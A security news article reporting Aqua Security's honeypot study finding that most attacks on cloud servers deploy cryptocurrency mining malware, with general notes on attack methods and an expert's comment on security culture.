Almost All Cyber Attacks on Cloud Servers Involve Cryptocurrency Mining, a New Study Found

 In Cyber/ICT, Infrastructure

Most attacks tar­get­ing cloud infra­struc­ture deploy cryp­tocur­ren­cy mining mal­ware rather than exe­cute other forms of cyber attacks, a study by Aqua Security found. The study, which took place between June 2019 and July 2020, ana­lyzed over 16,371 attacks on hon­ey­pot servers.  The decoys were deployed to study the pat­tern of cyber-attacks on cloud servers. The researchers noted that these forms of attacks increased by up to 250% from the pre­vi­ous year. This devel­op­ment was because the attack land­scape shift­ed towards orga­nized cyber­crime, where crim­i­nal gangs invest­ed in more cloud infra­struc­ture, the researchers said.

Cryptocurrency mining cyber attacks most prominent on cloud servers

Aqua’s “2020 Cloud Native Threat Report” noted that hack­ers attempt­ed to take over cloud servers and deploy mali­cious con­tain­ers and server images. Most of the images (95%) were aimed at mining cryp­tocur­ren­cy instead of exfil­trat­ing sen­si­tive data or exe­cut­ing other forms of cyber-attacks. The researchers noted that only 5% of the con­tain­ers deployed on cloud servers were used in exe­cut­ing DDoS attacks.

Cyber attacks shifted towards organized cybercrime

Aqua Security researchers dis­cov­ered that the threat land­scape shift­ed towards orga­nized cyber­crime rather than indi­vid­ual hack­ers work­ing alone. This allowed threat actors to invest in more cyber­crime infra­struc­ture, lead­ing to increased fre­quen­cy and sophis­ti­ca­tion of cyber attacks tar­get­ing cloud servers.

Intrusion meth­ods are also diver­si­fied because of the col­lab­o­ra­tion between var­i­ous threat actors. The report authors spec­u­lat­ed that the trend was expect­ed to con­tin­ue as attack­ers diver­si­fied the attack vec­tors and objec­tives.

Some notable exploit meth­ods high­light­ed by the researchers includ­ed the exploita­tion of unpatched sys­tems, scan­ning exposed cloud servers or those with open pass­words, and brute force attacks. Attacks on mis­con­fig­ured servers also rose sharply at the begin­ning of the year.

Cybercrime gangs also con­duct­ed supply chain cyber attacks against com­pa­nies man­ag­ing cloud com­put­ing infra­struc­ture. These forms of cyber attacks allowed them to com­pro­mise more accounts for deploy­ing their cryp­tocur­ren­cy mining mal­ware.

Increasingly sophisticated cryptocurrency mining malware

The deploy­ment of mal­ware in public reg­istries also became a common method of installing cryp­tocur­ren­cy mining mal­ware. These images remained dor­mant and acti­vat­ed once the con­tain­ers were deployed on cloud servers. By doing so, the hack­ers could dis­trib­ute their mal­ware to more cloud server instances with­out nec­es­sar­i­ly breach­ing the sys­tems.

Aqua researchers also found that there was an increase in the com­plex­i­ty of cryp­tocur­ren­cy mining mal­ware. The rogue soft­ware could per­form advanced func­tions to cement its dom­i­na­tion of the cloud servers.

For exam­ple, attack­ers deployed multi-stage pay­loads and applied 64-bit encod­ing to avoid detec­tion. The attack­ers also dis­abled rivals’ cryp­tocur­ren­cy mining mal­ware to main­tain exclu­sive con­trol of the hijacked cloud servers. Kicking rivals off the server freed them from the need to com­pete for resources on the com­pro­mised cloud servers.

Aqua’s report also found that profit-making was the pri­ma­ry moti­va­tion of the threat actors. This motive influ­enced their deci­sion to focus on cryp­tocur­ren­cy mining instead of other forms of attacks.

Researchers found that almost all #cyber­at­tacks on #cloud servers aim to deploy #cryp­tocur­ren­cy mining #mal­ware. #cyber­se­cu­ri­ty #respect­da­ta Click to Tweet

Commenting on the increased fre­quen­cy of cryp­tocur­ren­cy mining cyber attacks tar­get­ed at cloud servers, Javvad Malik, a Security Awareness Advocate at KnowBe4, says:

“There are no dig­i­tal resources that crim­i­nals can’t find a way to take advan­tage of. Whether that be an account cre­den­tial, an unse­cured cloud server, or an unclaimed domain name. All of these can be direct­ly or indi­rect­ly exploit­ed to launch attacks or make money. It’s why orga­ni­za­tions should not only focus on the impact of threats but the root causes and find­ing ways to close those avenues. This trans­lates to having a cul­ture of secu­ri­ty in which all aspects of secu­ri­ty, from design, imple­men­ta­tion, to assur­ance is con­sid­ered to ensure that an orga­ni­za­tions’ dig­i­tal assets are a less attrac­tive target for crim­i­nals.”

CPO Magazine source|articles

Recommended Posts

Start typing and press Enter to search